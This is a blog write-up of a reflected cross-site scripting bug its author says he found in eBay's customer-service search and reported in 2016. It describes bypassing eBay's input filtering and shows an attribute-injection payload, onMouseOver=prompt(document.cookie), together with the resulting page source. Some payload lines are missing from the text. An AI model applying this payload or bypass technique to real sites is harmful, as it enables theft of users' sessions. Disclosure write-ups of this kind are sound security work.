ByPassing eBay XSS Protection

Nirmal Dahal
Mar 7 · 3 min read

Hi, there today I want to share small proof of concept regarding “Reflective Cross-Site Scripting [ R-XSS ]” which I had found on eBay back in 2016. I am not an active participant in bug bounty programs, but one day I had finished all my office works so I was surfing on Facebook and received a message from my brother, Samir, asking for advice regarding some musical instruments. The message contained an eBay link. Once on eBay, I logged into the site to view details and suddenly noticed the “Help & Contact” menu, I followed that menu and went to the “Customer Service” page where I saw a search field, I decided to check for “Cross-Site Scripting [ XSS ]” vulnerability and unexpectedly found POST type R-XSS.

Testing For XSS

As all security researchers do, I also have certain pathways to find vulnerabilities. I always use’>Test12345<“ as it contains a number, letter, and syntax. This allows me to see how a website handles user inputs. Some questions like “is the user input sanitized? how sensitive is user input?” can be answered from this idea.

Finding XSS

Once I noticed the “Customer service” page with a search field, I used that specific text in the field. I noticed that the value was being reflected without . I immediately figured out that eBay must have been replacing those syntaxes in White Space. The output in View-Source was like below:

<input type=”text” id=”query“ role=”combobox” name=”query” value=”” title=”Search by help topic, keywords, or phrases” aria-expanded=”false” aria-autocomplete=”list” aria-activedescendant=”” aria-value=”” autocomplete=”off” aria-owns=”popup” class=”dText3“></input>

To test and understand the application further, I used this payload

however, the syntax was still filtered by eBay. So I encoded it in URL ENCODE format:

After that the page source for that specific part was as follow:

<input type=”text” id=”query“ role=”combobox” name=”query” value=”” script alert 1 script input type=”” title=”Search by help topic, keywords, or phrases” aria-expanded=”false” aria-autocomplete=”list” aria-activedescendant=”” aria-value=”” script alert 1 script input type=”” autocomplete=”off” aria-owns=”popup” class=”dText3“></input>

By seeing this, I realized that eBay was also filtering URL encoded syntax except for & which decoded value is and

After these research were made, I tweaked my payload a little to: which decodes to “ onMouseOver=“prompt(document.cookie)

Finally, after this, the XSS attack was successful and all was good to go.

<input type=”text” id=”query“ role=”combobox” name=”query” value=” ” onMouseOver=”prompt(document.cookie)” title=”Search by help topic, keywords, or phrases” aria-expanded=”false” aria-autocomplete=”list” aria-activedescendant=”” aria-value=” ” onMouseOver=”prompt(document.cookie)” autocomplete=”off” aria-owns=”popup” class=”dText3“></input>

Almost all eBay domains were vulnerable at that time including eBay.in, eBay.com.au etc

Reply From eBay Security Team
Acknowledgment By eBay
Video POC

Thank you all for reading this write-up. Please feel free to ask if you have any confusion about this article and if I had made any mistake please leave a comment 🙂 or message me on Twitter.

Pentester Nepal

infosec, bugbounty, privacy, security

Pentester Nepal

Aim to feature infosec, bug bounty, privacy and security awareness articles from Nepali security researchers and bug bounty hunters.

Nirmal Dahal

Written by

C|EH Master | CNSS | NSE | CCNA Cyber Ops | CPISI | CSFPC

Pentester Nepal

Aim to feature infosec, bug bounty, privacy and security awareness articles from Nepali security researchers and bug bounty hunters.